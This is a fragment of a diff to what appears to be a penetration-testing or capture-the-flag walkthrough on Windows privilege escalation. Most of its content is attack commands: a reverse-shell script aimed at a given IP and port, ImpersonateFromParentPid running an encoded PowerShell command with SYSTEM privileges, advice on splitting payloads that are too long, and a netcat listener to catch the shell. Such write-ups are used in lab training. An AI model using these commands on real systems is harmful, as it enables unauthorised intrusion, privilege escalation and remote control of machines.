Skip to content

 python3 revshell.py 10.11.92.52 9002

-6. Impersonate and Execute Another Command with SYSTEM Privileges:
+6. Impersonate and execute a command with SYSTEM privileges:

 ImpersonateFromParentPid -ppid 548 -command "c:\windows\system32\cmd.exe" -cmdargs "/c powershell -e [BASE64-ENCODED-COMMAND]"

-7. If you encounter error 122- ERROR_INSUFFICIENT_BUFFER, it indicates the command buffer is too small.
-Use shorter commands or split the payload into smaller parts:
+7. If you encounter Error 122: ERROR_INSUFFICIENT_BUFFER, the payload is too long.
+Use shorter commands or split the payload.
+For example:

 ImpersonateFromParentPid -ppid 548 -command "c:\windows\system32\cmd.exe" -cmdargs "/c powershell -e [BASE64-ENCODED-COMMAND]"

-9. Use a Netcat Listener to Catch the Shell :
+9. Set up a Netcat listener to catch the shell:

 rlwrap -cAr nc -lnvp 9002